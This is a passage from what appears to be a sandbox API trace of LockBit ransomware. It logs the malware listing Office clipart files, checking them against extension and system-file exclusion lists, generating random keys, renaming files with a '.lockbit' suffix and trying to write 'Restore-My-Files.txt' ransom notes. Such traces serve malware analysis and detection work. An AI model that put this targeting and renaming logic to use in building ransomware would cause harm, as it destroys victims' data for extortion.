Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned=".WMF" [0113.734] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.734] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.734] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.735] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.735] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF.lockbit") returned 72 [0113.735] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.736] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.736] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.736] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=736) returned 1 [0113.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.738] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.746] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.746] malloc (_Size=0xa6) returned 0x77d7a8 [0113.746] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0113.746] free (_Block=0x77d7a8) [0113.746] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.746] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.746] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.747] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1131c200, ftCreationTime.dwHighDateTime=0x1bd4b37, ftLastAccessTime.dwLowDateTime=0x51fbcc50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1131c200, ftLastWriteTime.dwHighDateTime=0x1bd4b37, nFileSizeHigh=0x0, nFileSizeLow=0x439c, dwReserved0=0x0, dwReserved1=0x0, cFileName="EN00397_.WMF", cAlternateFileName="")) returned 1 [0113.747] lstrcmpiW (lpString1=".", lpString2="EN00397_.WMF") returned -1 [0113.747] lstrcmpiW (lpString1="..", lpString2="EN00397_.WMF") returned -1 [0113.747] PathFindExtensionW (pszPath="EN00397_.WMF") returned=".WMF" [0113.747] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.747] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.748] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.748] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="EN00397_.WMF") returned 1 [0113.748] lstrcmpiW (lpString1="ntldr", lpString2="EN00397_.WMF") returned 1 [0113.749] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="EN00397_.WMF") returned 1 [0113.749] lstrcmpiW (lpString1="bootsect.bak", lpString2="EN00397_.WMF") returned -1 [0113.749] lstrcmpiW (lpString1="autorun.inf", lpString2="EN00397_.WMF") returned -1 [0113.749] lstrcmpiW (lpString1="thumbs.db", lpString2="EN00397_.WMF") returned 1 [0113.749] lstrcmpiW (lpString1="iconcache.db", lpString2="EN00397_.WMF") returned 1 [0113.749] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.749] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned=".WMF" [0113.749] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.749] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.749] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.750] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.750] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.750] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.750] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.750] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.750] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.750] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.750] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.750] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF.lockbit") returned 72 [0113.750] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.751] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.751] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.751] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=17308) returned 1 [0113.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.752] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.752] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.757] malloc (_Size=0xa6) returned 0x77d7a8 [0113.757] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.760] free (_Block=0x77d7a8) [0113.760] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.760] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.760] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.760] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51904f00, ftCreationTime.dwHighDateTime=0x1bd4bce, ftLastAccessTime.dwLowDateTime=0x51fbcc50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x51904f00, ftLastWriteTime.dwHighDateTime=0x1bd4bce, nFileSizeHigh=0x0, nFileSizeLow=0x1f08, dwReserved0=0x0, dwReserved1=0x0, cFileName="EN00902_.WMF", cAlternateFileName="")) returned 1 [0113.760] lstrcmpiW (lpString1=".", lpString2="EN00902_.WMF") returned -1 [0113.760] lstrcmpiW (lpString1="..", lpString2="EN00902_.WMF") returned -1 [0113.760] PathFindExtensionW (pszPath="EN00902_.WMF") returned=".WMF" [0113.760] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.760] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.760] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.760] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.760] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.760] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.761] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.761] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.762] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="EN00902_.WMF") returned 1 [0113.762] lstrcmpiW (lpString1="ntldr", lpString2="EN00902_.WMF") returned 1 [0113.762] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="EN00902_.WMF") returned 1 [0113.762] lstrcmpiW (lpString1="bootsect.bak", lpString2="EN00902_.WMF") returned -1 [0113.762] lstrcmpiW (lpString1="autorun.inf", lpString2="EN00902_.WMF") returned -1 [0113.762] lstrcmpiW (lpString1="thumbs.db", lpString2="EN00902_.WMF") returned 1 [0113.762] lstrcmpiW (lpString1="iconcache.db", lpString2="EN00902_.WMF") returned 1 [0113.762] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.762] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned=".WMF" [0113.763] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.763] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.763] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.764] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.764] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.764] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.764] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF.lockbit") returned 72 [0113.764] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.765] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.765] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.765] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7944) returned 1 [0113.765] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.766] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.766] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.766] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.766] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.772] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.774] malloc (_Size=0xa6) returned 0x77d7a8 [0113.774] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0113.775] free (_Block=0x77d7a8) [0113.775] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.775] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.775] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.775] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x2942, dwReserved0=0x0, dwReserved1=0x0, cFileName="EXPLR_01.MID", cAlternateFileName="")) returned 1 [0113.775] lstrcmpiW (lpString1=".", lpString2="EXPLR_01.MID") returned -1 [0113.775] lstrcmpiW (lpString1="..", lpString2="EXPLR_01.MID") returned -1 [0113.775] PathFindExtensionW (pszPath="EXPLR_01.MID") returned=".MID" [0113.775] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0113.775] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0113.775] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 